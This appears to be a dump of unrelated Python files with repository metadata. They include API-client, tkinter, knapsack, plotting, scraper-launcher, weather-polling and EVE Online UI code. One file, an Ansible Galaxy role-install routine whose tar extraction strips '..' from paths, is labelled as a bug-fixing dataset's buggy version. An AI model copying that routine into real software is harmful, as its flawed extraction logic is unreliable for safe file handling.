Type of relationship between source and linked Artifact
:return: The link_type of this LinkedArtifact.
:rtype: str
"""
return self._link_type
@link_type.setter
def link_type(self, link_type):
"""
Sets the link_type of this LinkedArtifact.
Type of relationship between source and linked Artifact
:param link_type: The link_type of this LinkedArtifact.
:type: str
"""
self._link_type = link_type
@property
def _self(self):
"""
Gets the _self of this LinkedArtifact.
URL to linked artifact
:return: The _self of this LinkedArtifact.
:rtype: str
"""
return self.__self
@_self.setter
def _self(self, _self):
"""
Sets the _self of this LinkedArtifact.
URL to linked artifact
:param _self: The _self of this LinkedArtifact.
:type: str
"""
self.__self = _self
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, LinkedArtifact):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"ryan.gard@rackspace.com"
] | ryan.gard@rackspace.com |
481ad6fb62ef15a1ee98f3b5f4350de4a9dcbd52 | 978c9a1dd27a30b32eceed7f1518a26292695891 | /python/2021/other/weather_api.py | f0b71270fdf2f0517f792a8c2216904cb24f3455 | [] | no_license | detcitty/100DaysOfCode | 4da3407bdc4170f9d042f49e6c94a8469f8808f5 | a3d989ea56491f89ece5191d5246166ca01d2602 | refs/heads/master | 2023-08-09T04:45:51.842305 | 2023-07-21T17:02:08 | 2023-07-21T17:02:08 | 178,976,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | import os
import requests
import json
KEY = os.getenv('AQS_API_KEY')
EMAIL = os.getenv('MY_EMAIL')
print(KEY)
url = ' https://aqs.epa.gov/data/api/moniters/bySite'
params = {
'email': EMAIL,
'key': KEY,
'param': 'ALL',
'bdate': 20210101,
'edate': 20210214,
'state': 49,
'county': 35,
'site': 13
}
def jprint(obj):
text = json.dumps(obj, sort_keys=True, indent=4)
response = requests.get(url, params=params)
jprint(response.json()) | [
"devin.etcitty@gmail.com"
] | devin.etcitty@gmail.com |
ed90d21b756c2faab22171990cb6be9c38c4d785 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/0e16a5f3ee9b8c7e931b860f7790ea9a6197651b-<install>-bug.py | cf7b852b3186bff51a0088e47a08ccab0dae2941 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,338 | py | def install(self):
if self.scm:
tmp_file = RoleRequirement.scm_archive_role(**self.spec)
elif self.src:
if os.path.isfile(self.src):
tmp_file = self.src
elif ('://' in self.src):
role_data = self.src
tmp_file = self.fetch(role_data)
else:
api = GalaxyAPI(self.galaxy)
role_data = api.lookup_role_by_name(self.src)
if (not role_data):
raise AnsibleError(('- sorry, %s was not found on %s.' % (self.src, api.api_server)))
role_versions = api.fetch_role_related('versions', role_data['id'])
if (not self.version):
if (len(role_versions) > 0):
loose_versions = [LooseVersion(a.get('name', None)) for a in role_versions]
loose_versions.sort()
self.version = str(loose_versions[(- 1)])
elif role_data.get('github_branch', None):
self.version = role_data['github_branch']
else:
self.version = 'master'
elif (self.version != 'master'):
if (role_versions and (self.version not in [a.get('name', None) for a in role_versions])):
raise AnsibleError(('- the specified version (%s) of %s was not found in the list of available versions (%s).' % (self.version, self.name, role_versions)))
tmp_file = self.fetch(role_data)
else:
raise AnsibleError('No valid role data found')
if tmp_file:
display.debug(('installing from %s' % tmp_file))
if (not tarfile.is_tarfile(tmp_file)):
raise AnsibleError('the file downloaded was not a tar.gz')
else:
if tmp_file.endswith('.gz'):
role_tar_file = tarfile.open(tmp_file, 'r:gz')
else:
role_tar_file = tarfile.open(tmp_file, 'r')
meta_file = None
members = role_tar_file.getmembers()
for member in members:
if (self.META_MAIN in member.name):
meta_file = member
break
if (not meta_file):
raise AnsibleError('this role does not appear to have a meta/main.yml file.')
else:
try:
self._metadata = yaml.safe_load(role_tar_file.extractfile(meta_file))
except:
raise AnsibleError('this role does not appear to have a valid meta/main.yml file.')
display.display(('- extracting %s to %s' % (self.name, self.path)))
try:
if os.path.exists(self.path):
if (not os.path.isdir(self.path)):
raise AnsibleError('the specified roles path exists and is not a directory.')
elif (not getattr(self.options, 'force', False)):
raise AnsibleError(('the specified role %s appears to already exist. Use --force to replace it.' % self.name))
elif (not self.remove()):
raise AnsibleError(("%s doesn't appear to contain a role.\n please remove this directory manually if you really want to put the role here." % self.path))
else:
os.makedirs(self.path)
for member in members:
if (member.isreg() or member.issym()):
parts = member.name.split(os.sep)[1:]
final_parts = []
for part in parts:
if ((part != '..') and ('~' not in part) and ('$' not in part)):
final_parts.append(part)
member.name = os.path.join(*final_parts)
role_tar_file.extract(member, self.path)
self._write_galaxy_install_info()
except OSError as e:
raise AnsibleError(('Could not update files in %s: %s' % (self.path, str(e))))
display.display(('- %s was installed successfully' % self.name))
try:
os.unlink(tmp_file)
except (OSError, IOError) as e:
display.warning(('Unable to remove tmp file (%s): %s' % (tmp_file, str(e))))
return True
return False | [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
d3878e2d9c6758ee16ae2176a95d594c2e3238eb | 0ee88932af5b6ed088e471abcbd5f40fd9cbd688 | /Course/Book/Programmer_avec_Python3/8-Tkinter/attractionclic.py | 0e6e7adc9081b4ab66e95a67b4f2a1cbe9c66bd3 | [] | no_license | BjaouiAya/Cours-Python | 48c740966f9814e1045035ffb902d14783d36194 | 14b306447e227ddc5cb04b8819f388ca9f91a1d6 | refs/heads/master | 2021-06-10T22:17:38.731030 | 2016-11-11T16:45:05 | 2016-11-11T16:45:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,009 | py | #! /usr/bin/env python
# -*- coding:Utf8 -*-
"PROGRAMME AUTOUR DE L'ATTRACTION TERRESTRE AVEC CLIC"
################################################################
############# Importation fonction et modules : ################
################################################################
from tkinter import *
from math import sqrt
###################################################################################################
############# Gestion d'évènements : définition de différentes fonctions utiliées : ##############
###################################################################################################
def avance(n, xcoord, ycoord):
"Procédure générale"
global x, y
x[n], y[n] = x[n] + xcoord, y[n] + ycoord
can1.coords(astre[n], x[n], y[n], x[n]+xx, y[n]+yy)
"distance entre le 2 astres"
distanceastres = mesuredistance(x[0], x[1], y[0], y[1])
"distance en km entre les 2 astres"
distancereele = distanceastres * 1e9 # assimile 1 pixel à 1 000 000 de km
"force gravittionelle entre les 2 astres"
force = forceG(m1, m2, distancereele)
distance.configure(text = 'Distance de ' + str(distancereele) + ' Km')
forcegrav.configure(text = 'Force de ' + str(force) + ' KN')
decalage = distanceastres / 10
def avanceclic(event):
"Procédure générale"
global x, y
x[masseclic], y[masseclic] = event.x-xx/2, event.y-yy/2
"on décale l'astre afin de le faire apparaître au centre du clic et non en décalage"
can1.coords(astre[masseclic], x[masseclic], y[masseclic], x[masseclic]+xx, y[masseclic]+yy)
"distance entre les 2 astres : on déduit de chaques astres la moitié afin de corriger l'écart dû au clic (clic prend des coordonnées point haut à gauche"
distanceastres = mesuredistance(x[0], x[1], y[0], y[1])
"distance en km entre les 2 astres"
distancereele = distanceastres * 1e9 # assimile 1 pixel à 1 000 000 de km
"force gravittionelle entre les 2 astres"
force = forceG(m1, m2, distancereele)
distance.configure(text = 'Distance de ' + str(distancereele) + ' Km')
forcegrav.configure(text = 'Force de ' + str(force) + ' KN')
decalage = distanceastres / 10
def forceG(m1, m2, distanceastres):
"force de gravitation s'exerçant entre m1 et m2 pour une distance di"
if distanceastres == 0: # evite une division par 0 qui se solde par une erreur
return 'infini'
return int((m1*m2*6.67e-11/distanceastres**2)/1000)
def mesuredistance(x1, x2, y1, y2):
d = int(sqrt((x2 - x1)**2 + (y2 - y1)**2))
return d
def deplacement_gauche1():
avance(0, -decalage, 0)
def deplacement_droite1():
avance(0, decalage, 0)
def deplacement_bas1():
avance(0, 0, decalage)
def deplacement_haut1():
avance(0, 0, -decalage)
def deplacement_gauche2():
avance(1, -decalage, 0)
def deplacement_droite2():
avance(1, decalage, 0)
def deplacement_bas2():
avance(1, 0, decalage)
def deplacement_haut2():
avance(1, 0, -decalage)
def selection1():
global masseclic
masseclic = 0
def selection2():
global masseclic
masseclic = 1
######################################################
############## Programme principal : #################
######################################################
"coordonnées de base"
x = [50, 10] # liste pour les coordonnées en x des astres
y = [100, 50] # liste pour les coordonnées en y des astres
"taille pointeur"
xx, yy = 30, 30
"masse des astres"
m1 = 6e24
m2 = 6e24
"décalage de base"
decalage = 5
masseclic = 0 # permet de sélectionner une ou l'autre des masses
"Liste permettant de mémoriser les indices du dessin"
astre = [0]*2 # liste servant à mémoriser les références des dessins
"widgets"
fen1 = Tk()
fen1.title("Attration atrale")
can1 = Canvas(fen1, width = 400, height = 200, bg = 'grey')
can1.grid(row =2, column =1, columnspan =3, padx = 20, pady = 20)
astre[0] = can1.create_oval(x[0], y[0], x[0]+xx, y[0]+yy, width = 2, fill = 'blue')
astre[1] = can1.create_oval(x[1], y[1], x[1]+xx, y[1]+yy, width = 2, fill = 'green')
"textes des différentes fenêtres"
valmasse1 = Label(fen1, text = 'Astre 1 : '+ str(m1) + ' Kg')
valmasse2 = Label(fen1, text = 'Astre 2 : '+ str(m2) + ' Kg')
distance = Label(fen1)
forcegrav = Label(fen1)
valmasse1.grid(row = 1, column = 1, padx = 5, pady = 5, sticky = W)
valmasse2.grid(row = 1, column = 3, padx = 5, pady = 5, sticky = E)
distance.grid(row = 4, column = 1, padx = 5, pady = 5)
forcegrav.grid(row = 4, column = 3, padx = 5, pady = 5)
############################################
"GROUPE ASTRE 1 AVEC 4 BOUTTONS"
fra1 = Frame(fen1) # association dans un cadre un ensemble de bouttons
fra1.grid(row = 3, column = 1, sticky = W, padx = 10, pady = 10)
Button(fra1, fg = 'blue', command = deplacement_bas1, text = 'v').pack(side = LEFT)
Button(fra1, fg = 'blue', command = deplacement_haut1, text = '^').pack(side = LEFT)
Button(fra1, fg = 'blue', command = deplacement_droite1, text = '->').pack(side = LEFT)
Button(fra1, fg = 'blue', command = deplacement_gauche1, text = '<-').pack(side = LEFT)
"GROUPE ASTRE 2 AVEC 4 BOUTTONS"
fra2 = Frame(fen1)
fra2.grid(row = 3, column = 3, sticky = E, padx = 10, pady = 10)
Button(fra2, fg = 'green', command = deplacement_bas2, text = 'v').pack(side =LEFT)
Button(fra2, fg = 'green', command = deplacement_haut2, text = '^').pack(side =LEFT)
Button(fra2, fg = 'green', command = deplacement_droite2, text = '->').pack(side =LEFT)
Button(fra2, fg = 'green', command = deplacement_gauche2, text = '<-').pack(side =LEFT)
#############################################
"permet de bouger les 2 astres par sélection par un boutton puis nouvelle position par clic"
can1.bind("<Button-1>", avanceclic)
Button(fen1, fg = 'black', command = selection1, text = 'Astre bleu').grid(row = 0, column = 1)
Button(fen1, fg = 'black', command = selection2, text = 'Astre vert').grid(row = 0, column = 3)
#############################################
Button(fen1, command = fen1.quit, text = 'Quitter').grid(row = 5, column = 3)
fen1.mainloop()
| [
"jeremybois@rocketmail.com"
] | jeremybois@rocketmail.com |
fbb9cca9d323db892b0cf407f976508f8e25e925 | 7c73ae5308f16030de337e2ad6dc30ac3f4a6d05 | /动态规划/背包问题.py | f1bccd5dbdd11c3581e2c1b56352eae39701c2aa | [] | no_license | pol9111/algorithms | c2508470e4e8c46f4368411a9614adbb210cfa33 | 4bd5d8cb3db9d15c23ebf217181a5f54c00c1687 | refs/heads/master | 2023-06-07T20:47:33.200001 | 2023-05-27T16:50:24 | 2023-05-27T16:50:24 | 150,764,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,799 | py |
# 这里使用了图解中的吉他,音箱,电脑,手机做的测试,数据保持一致
w = [0, 1, 4, 3, 1] #n个物体的重量(w[0]无用)
p = [0, 1500, 3000, 2000, 2000] #n个物体的价值(p[0]无用)
n = len(w) - 1 #计算n的个数
m = 4 #背包的载重量
x = [] #装入背包的物体,元素为True时,对应物体被装入(x[0]无用)
v = 0
#optp[i][j]表示在前i个物体中,能够装入载重量为j的背包中的物体的最大价值
optp = [[0 for col in range(m + 1)] for raw in range(n + 1)]
#optp 相当于做了一个n*m的全零矩阵的赶脚,n行为物件,m列为自背包载重量
print(optp)
def knapsack_dynamic(w, p, n, m, x):
#计算optp[i][j]
for i in range(1, n + 1): # 物品一件件来
for j in range(1, m + 1): # j为子背包的载重量,寻找能够承载物品的子背包
if j >= w[i]: # 当物品的重量小于背包能够承受的载重量的时候,才考虑能不能放进去
# optp[i - 1][j]是上一个单元的值, optp[i - 1][j - w[i]]为剩余空间的价值
optp[i][j] = max(optp[i - 1][j], optp[i - 1][j - w[i]] + p[i])
else: # 能放下, 就减去重量加上价格, 0 + 1500
optp[i][j] = optp[i - 1][j]
print(optp)
#递推装入背包的物体,寻找跳变的地方,从最后结果开始逆推
j = m
for i in range(n, 0, -1):
if optp[i][j] > optp[i - 1][j]:
x.append(i)
j = j - w[i]
#返回最大价值,即表格中最后一行最后一列的值
v = optp[n][m]
return v
print('最大值为:' + str(knapsack_dynamic(w, p, n, m, x)))
print('物品的索引:',x)
print('物品的索引:',optp)
| [
"biscuit36@163.com"
] | biscuit36@163.com |
b71cfdda577fac6fe368c3a6dae442d8a5020cd7 | d77f44f98f695a3bdb00f021ad2e685483b032c5 | /examples/plot_events.py | f47d98975f040e2e7d60c3d51cd76512b703b869 | [
"MIT"
] | permissive | thomasgas/pyeventio | d8d5df32f8f644b7f8877ba370d3c5179bef58a8 | 0edfb05b56ed3a3e8a37c0292cede90598464b8f | refs/heads/master | 2020-04-21T21:59:11.105773 | 2019-04-29T16:04:51 | 2019-04-29T16:04:51 | 169,896,133 | 0 | 0 | MIT | 2019-02-09T18:01:11 | 2019-02-09T18:01:10 | null | UTF-8 | Python | false | false | 2,319 | py | import matplotlib.pyplot as plt
import numpy as np
from argparse import ArgumentParser
from functools import lru_cache
import astropy.units as u
from ctapipe.instrument import CameraGeometry
from ctapipe.visualization import CameraDisplay
from eventio.simtel import SimTelFile
parser = ArgumentParser()
parser.add_argument('inputfile')
args = parser.parse_args()
@lru_cache()
def build_cam_geom(simtel_file, telescope_id):
cam_data = simtel_file.telescope_descriptions[telescope_id]['camera_settings']
if cam_data['pixel_shape'][0] == 2:
pix_type = 'square'
pix_rotation = 0 * u.deg
elif cam_data['pixel_shape'][0] == 1:
pix_type = 'hexagonal'
# LST has 0 deg rotation, MST 30 (flat top vs. pointy top hexagons)
if cam_data['n_pixels'] == 1855:
pix_rotation = 0 * u.deg
else:
pix_rotation = 30 * u.deg
# if pix_type == -1, we have to guess
elif cam_data['pixel_shape'][0] == -1:
if cam_data['n_pixels'] > 2000:
pix_type = 'square'
pix_rotation = 0 * u.deg
else:
pix_type = 'hexagonal'
# LST has 0 deg rotation, MST 30 (flat top vs. pointy top hexagons)
if cam_data['n_pixels'] == 1855:
pix_rotation = 0 * u.deg
else:
pix_rotation = 30 * u.deg
return CameraGeometry(
cam_id='CAM-{}'.format(telescope_id),
pix_id=np.arange(cam_data['n_pixels']),
pix_x=cam_data['pixel_x'] * u.m,
pix_y=cam_data['pixel_y'] * u.m,
pix_area=cam_data['pixel_area'] * u.m**2,
pix_type=pix_type,
cam_rotation=cam_data['cam_rot'] * u.rad,
pix_rotation=pix_rotation,
)
with SimTelFile(args.inputfile) as f:
for array_event in f:
print('Event:', array_event['event_id'])
for telescope_id, event in array_event['telescope_events'].items():
print('Telescope:', telescope_id)
data = event.get('adc_samples')
if data is None:
data = event['adc_sums'][:, :, np.newaxis]
image = data[0].sum(axis=1)
cam = build_cam_geom(f, telescope_id)
plt.figure()
disp = CameraDisplay(cam)
disp.image = image
plt.show()
| [
"maximilian.noethe@tu-dortmund.de"
] | maximilian.noethe@tu-dortmund.de |
6aecda70e197f8b3c3b83e2030bc806ffecc4a41 | 6b96a11195094a0023a059ba7d5df95ce58c56f1 | /1359A.py | 643057f4f600e4de77f8dcee5062457fd853ebad | [] | no_license | ldfdev/CodeForces-Div2-Problems | d932b09ee14a430fd0054d5b295f6016553be2b7 | d18824a4330a4593099d249496ae22f3f69d5f44 | refs/heads/master | 2021-08-11T03:29:18.772870 | 2021-07-25T07:21:09 | 2021-07-29T20:09:43 | 72,371,376 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | def inp():
return list(map(int, input().split()))
def solve():
[cards, jokers, players] = inp()
if jokers == 0:
return 0
if cards == jokers:
return 0
lucky_player = cards // players
if jokers <= lucky_player:
return jokers
jokers -= lucky_player
if jokers % (players - 1) == 0:
return lucky_player - (jokers // (players - 1))
return lucky_player - 1 - (jokers // (players - 1))
if __name__=='__main__':
[tests] = inp()
for _ in range(tests):
print(solve()) | [
"ldf.develop@gmail.com"
] | ldf.develop@gmail.com |
7ad767b1b94d4c9a1df15c7bfc4abe595a0b2a13 | 325bee18d3a8b5de183118d02c480e562f6acba8 | /taiwan/italy/start.py | a394a4bb37e379ca7be1a371406ca0376d18a494 | [] | no_license | waynecanfly/spiderItem | fc07af6921493fcfc21437c464c6433d247abad3 | 1960efaad0d995e83e8cf85e58e1db029e49fa56 | refs/heads/master | 2022-11-14T16:35:42.855901 | 2019-10-25T03:43:57 | 2019-10-25T03:43:57 | 193,424,274 | 4 | 0 | null | 2022-11-04T19:16:15 | 2019-06-24T03:00:51 | Python | UTF-8 | Python | false | false | 1,038 | py | import os
"""
taiwanlistzh下载台湾中文列表,已做更新功能
taiwanlisten下载台湾英文列表,已做更新功能
info_enAll首次存量下载台湾英文基本信息
info_en为下载台湾增量基本信息而生
以下若要更新需覆盖
taiwanFileAllv3下载英文财报,原网站最新只到2018年3月份
info_zhAll下载中文基本信息:"重要子公司基本資料","重要子公司異動說明", "被投資控股公司基本資料" (文件)
info_zh下载中文基本信息:"公司基本資料" (格式化)
info_zh2下载中文基本信息:"歷年變更登記"(文件) 需要界面化才能获取数据,需要windows系统
"""
os.chdir('/root/spiderItem/taiwan/italy/spiders')
os.system("python3 taiwanlistzh.py")
# os.system('python3 info_zhAll.py')
os.chdir('/root/spiderItem/taiwan/italy/script2')
os.system("python3 taiwanlisten.py")
os.system('python3 info_en.py')
# os.system("python3 taiwanFileAllv3.py")
# os.system('python3 info_zh.py')
# os.system('python3 info_zh2.py')
| [
"1370153124@qq.com"
] | 1370153124@qq.com |
5b240e6a01eaaca3b6de4c49d75c041e4867cf3e | 6d1df0707865398d15f508390ca595215210b504 | /xmonad/poll_weather.py | 0d9a3c2243aa6bfa26632e7e321d24e34684e44b | [] | no_license | supermiiiiii/scripts | 94a27741432c40781b3d577334e72f73f1efb914 | 524de087175d2e8b7e3adeacdd648fed9e07e204 | refs/heads/master | 2023-02-24T19:15:38.888248 | 2021-01-30T14:49:49 | 2021-01-30T14:49:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,351 | py | """Writes a weather report to some bar using a FIFO."""
import datetime as dt
import re
import subprocess as sp # noqa: F401
import sys
import time
from typing import NamedTuple, Optional, Sequence
import gutils
from gutils.io import eprint
from loguru import logger as log
@gutils.catch
def main(argv: Sequence[str] = None) -> int:
if argv is None:
argv = sys.argv
args = parse_cli_args(argv)
gutils.logging.configure(__file__, debug=args.debug, verbose=args.verbose)
return run(args)
class Arguments(NamedTuple):
debug: bool
verbose: bool
zipcode: str
weather_cmd: str
attempts: int
timeout: int
max_delay: int
def parse_cli_args(argv: Sequence[str]) -> Arguments:
parser = gutils.ArgumentParser()
parser.add_argument(
"zipcode", nargs="?", default="08060", help="zip code of location"
)
parser.add_argument(
"--weather-cmd",
default="weather",
help=(
"The command used to retrieve the weather report from the"
" command-line."
),
)
parser.add_argument(
"-n",
"--attempts",
type=int,
default=7,
help=(
"How many times should we attempt to run this command in the event"
" of failure/timeout?"
),
)
parser.add_argument(
"-t",
"--timeout",
type=int,
default=30,
help=(
"How long should we wait (in seconds) for the this command to"
" complete?"
),
)
parser.add_argument(
"--max-delay",
default=300,
type=int,
help="The maximum sleep time between command attempts.",
)
args = parser.parse_args(argv[1:])
kwargs = dict(args._get_kwargs())
return Arguments(**kwargs)
def run(args: Arguments) -> int:
raw_output = run_weather_cmd(
args.weather_cmd,
args.zipcode,
attempts=args.attempts,
timeout=args.timeout,
max_delay=args.max_delay,
)
if raw_output is None:
eprint(f"[ERROR] The {args.weather_cmd!r} command failed.")
return 1
loc = get_group("Current conditions at (.*)\n", raw_output)
temp = get_temp(raw_output)
humidity = get_humidity(raw_output)
sky = get_group(r"Sky conditions: ([A-z\s]+)$", raw_output)
wind = get_wind(raw_output)
assert loc is not None
report = format_report(loc, temp, sky, wind, humidity)
print(report)
return 0
def run_weather_cmd(
weather_cmd: str,
zipcode: str,
*,
attempts: int,
timeout: int,
max_delay: int,
) -> Optional[str]:
"""Runs the 'weather' command.
Returns:
Raw output of 'weather' command.
"""
cmd_list = [weather_cmd]
opts = ["--setpath", "/usr/share/weather-util", zipcode, "--no-cache"]
cmd_list.extend(opts)
def log_cmd(msg: str) -> None:
msg = "{!r} command: {}".format(weather_cmd, msg)
log.debug(msg)
rc = None
for i in range(attempts):
if i > 0:
# delay => 10s, 20s, 40s, 80s, ..., max_delay
delay = min(max_delay, 2 ** (i - 1) * 10)
log.debug(f"Waiting {delay}s before trying again.")
time.sleep(delay)
log_cmd(f"Attempt #{i + 1}")
child = sp.Popen(cmd_list, stdout=sp.PIPE, stderr=sp.PIPE)
try:
stdout, stderr = child.communicate(timeout=timeout)
except sp.TimeoutExpired:
log_cmd(f"TIMEOUT (after {timeout}s)")
else:
rc = child.returncode
output = stdout.decode().strip()
if rc == 0:
log_cmd("SUCCESS")
break
output += stderr.decode().strip()
log_cmd(f"FAILURE: {output}")
if rc == 0:
return output
else:
return None
def get_temp(raw_output: str) -> str:
"""Returns temperature."""
temp = get_group(r"Temperature: ([0-9]+\.[0-9]) F", raw_output)
if temp is None:
return "N/A"
else:
return f"{round(float(temp))} F"
def get_humidity(raw_output: str) -> Optional[str]:
humidity = get_group("Humidity:[ ]*([1-9][0-9]*%)", raw_output)
return humidity
def get_wind(raw_output: str) -> Optional[str]:
"""Returns wind description."""
wind = get_group(r"Wind: .*?([0-9\-]+ MPH)", raw_output)
if wind is None:
wind = get_group(r"Wind: (.*)", raw_output)
return wind
def get_group(pttrn: str, string: str) -> Optional[str]:
"""Returns the first group matched from a regex pattern."""
match = re.search(pttrn, string, re.M)
if match:
return match.groups()[0]
else:
return None
def format_report(
_loc: str,
temp: str,
sky: Optional[str],
wind: Optional[str],
humidity: Optional[str],
) -> str:
"""Formats weather report."""
report_fmt = "{} ::: TEMP: {}"
now = dt.datetime.now()
timestamp = now.strftime("@%H:%M:%S")
report = report_fmt.format(timestamp, temp)
if humidity is not None:
report = f"{report} | HUMIDITY: {humidity}"
if sky is not None:
report = f"{report} | SKY: {sky}"
if wind is not None:
report = f"{report} | WIND: {wind}"
return report
if __name__ == "__main__":
sys.exit(main())
| [
"bryanbugyi34@gmail.com"
] | bryanbugyi34@gmail.com |
3e063e740006b9aab8f0c31edc73a70926e13dd6 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/client/script/ui/station/fitting/minihangar.py | 1990c0fe486beccfd0fdcb8e5e6616770fb04410 | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,161 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\ui\station\fitting\minihangar.py
from carbonui.primitives.container import Container
from carbonui.primitives.fill import Fill
from eve.client.script.ui.shared.fitting.fittingStatsChanges import FittingStatsChanges
from inventorycommon.util import IsShipFittingFlag, IsShipFittable
import uicontrols
import uthread
import util
import carbonui.const as uiconst
import localization
import invCtrl
class CargoSlots(Container):
default_state = uiconst.UI_NORMAL
def ApplyAttributes(self, attributes):
Container.ApplyAttributes(self, attributes)
self.controller = attributes.controller
self.controller.on_stats_changed.connect(self.UpdateCargoSpace)
invController = self.GetInvController()
self.sr.icon = uicontrols.Icon(parent=self, size=32, state=uiconst.UI_DISABLED, ignoreSize=True, icon=invController.GetIconName())
self.sr.hint = invController.GetName()
self.sr.hilite = Fill(parent=self, name='hilite', align=uiconst.RELATIVE, state=uiconst.UI_HIDDEN, idx=-1, width=32, height=self.height)
self.sr.icon.color.a = 0.8
Container(name='push', parent=self, align=uiconst.TOLEFT, width=32)
self.sr.statusCont = Container(name='statusCont', parent=self, align=uiconst.TOLEFT, width=50)
self.sr.statustext1 = uicontrols.EveLabelMedium(text='status', parent=self.sr.statusCont, name='cargo_statustext', left=0, top=2, idx=0, state=uiconst.UI_DISABLED, align=uiconst.TOPRIGHT)
self.sr.statustext2 = uicontrols.EveLabelMedium(text='status', parent=self.sr.statusCont, name='cargo_statustext', left=0, top=14, idx=0, state=uiconst.UI_DISABLED, align=uiconst.TOPRIGHT)
m3TextCont = Container(name='m3Cont', parent=self, align=uiconst.TOLEFT, width=12)
self.sr.m3Text = uicontrols.EveLabelMedium(text=localization.GetByLabel('UI/Fitting/FittingWindow/CubicMeters'), parent=m3TextCont, name='m3', left=4, top=14, idx=0)
sm.GetService('inv').Register(self)
self.invReady = 1
self.UpdateCargoSpace()
def IsItemHere(self, item):
return self.GetInvController().IsItemHere(item)
def AddItem(self, item):
self.Update()
def UpdateItem(self, item, *etc):
self.Update()
def RemoveItem(self, item):
self.Update()
def OnMouseEnter(self, *args):
self.DoMouseEntering()
def OnMouseEnterDrone(self, *args):
if eve.session.stationid:
self.DoMouseEntering()
def DoMouseEntering(self):
self.Hilite(1)
self.sr.statustext1.OnMouseEnter()
self.sr.statustext2.OnMouseEnter()
self.sr.m3Text.OnMouseEnter()
def OnMouseExit(self, *args):
self.Hilite(0)
self.sr.statustext1.OnMouseExit()
self.sr.statustext2.OnMouseExit()
self.sr.m3Text.OnMouseExit()
uthread.new(self.Update)
def Hilite(self, state):
self.sr.icon.color.a = [0.8, 1.0][state]
def SetStatusText(self, text1, text2, color):
self.sr.statustext1.text = text1
self.sr.statustext2.text = localization.GetByLabel('UI/Fitting/FittingWindow/CargoUsage', color=color, text=text2)
self.sr.statusCont.width = max(0, self.sr.statustext1.textwidth, self.sr.statustext2.textwidth)
def OnDropData(self, dragObj, nodes):
self.Hilite(0)
def Update(self, multiplier = 1.0):
uthread.new(self._Update, multiplier)
def _Update(self, multiplier):
cap = self.GetCapacity()
if not cap:
return
if not self or self.destroyed:
return
cap2 = cap.capacity * multiplier
color = '<color=0xc0ffffff>'
if multiplier != 1.0:
color = '<color=0xffffff00>'
used = util.FmtAmt(cap.used, showFraction=1)
cap2 = util.FmtAmt(cap2, showFraction=1)
self.SetStatusText(used, cap2, color)
def GetCapacity(self, flag = None):
return self.GetInvController().GetCapacity()
class CargoDroneSlots(CargoSlots):
def GetInvController(self):
return invCtrl.ShipDroneBay(self.controller.GetItemID())
def OnDropData(self, dragObj, nodes):
invCtrl.ShipDroneBay(util.GetActiveShip()).OnDropData(nodes)
CargoSlots.OnDropData(self, dragObj, nodes)
def OnClick(self, *args):
uicore.cmd.OpenDroneBayOfActiveShip()
def UpdateCargoSpace(self):
typeID = self.controller.GetGhostFittedTypeID()
fittingChanges = FittingStatsChanges(typeID)
xtraDroneSpace = fittingChanges.GetExtraDroneSpaceMultiplier()
self.Update(xtraDroneSpace)
class CargoFighterSlots(CargoSlots):
def GetInvController(self):
return invCtrl.ShipFighterBay(self.controller.GetItemID())
def OnDropData(self, dragObj, nodes):
self.GetInvController().OnDropData(nodes)
CargoSlots.OnDropData(self, dragObj, nodes)
def OnClick(self, *args):
uicore.cmd.OpenFighterBayOfActiveShip()
def UpdateCargoSpace(self):
typeID = self.controller.GetGhostFittedTypeID()
fittingChanges = FittingStatsChanges(typeID)
xtraFighterSpace = fittingChanges.GetExtraFighterSpaceMultiplier()
self.Update(xtraFighterSpace)
class CargoStructureAmmoBay(CargoSlots):
def GetInvController(self):
return invCtrl.StructureAmmoBay(self.controller.GetItemID())
def OnDropData(self, dragObj, nodes):
self.GetInvController().OnDropData(nodes)
CargoSlots.OnDropData(self, dragObj, nodes)
def OnClick(self, *args):
invID = ('StructureAmmoBay', self.controller.GetItemID())
from eve.client.script.ui.shared.inventory.invWindow import Inventory
Inventory.OpenOrShow(invID, usePrimary=False, toggle=True)
def UpdateCargoSpace(self):
self.Update()
class CargoCargoSlots(CargoSlots):
def GetInvController(self):
return invCtrl.ShipCargo(self.controller.GetItemID())
def OnDropData(self, dragObj, nodes):
self.Hilite(0)
if len(nodes) == 1:
item = nodes[0].item
if IsShipFittingFlag(item.flagID):
dogmaLocation = sm.GetService('clientDogmaIM').GetDogmaLocation()
shipID = util.GetActiveShip()
if IsShipFittable(item.categoryID):
dogmaLocation.UnloadModuleToContainer(shipID, item.itemID, (shipID,), flag=const.flagCargo)
return
if item.categoryID == const.categoryCharge:
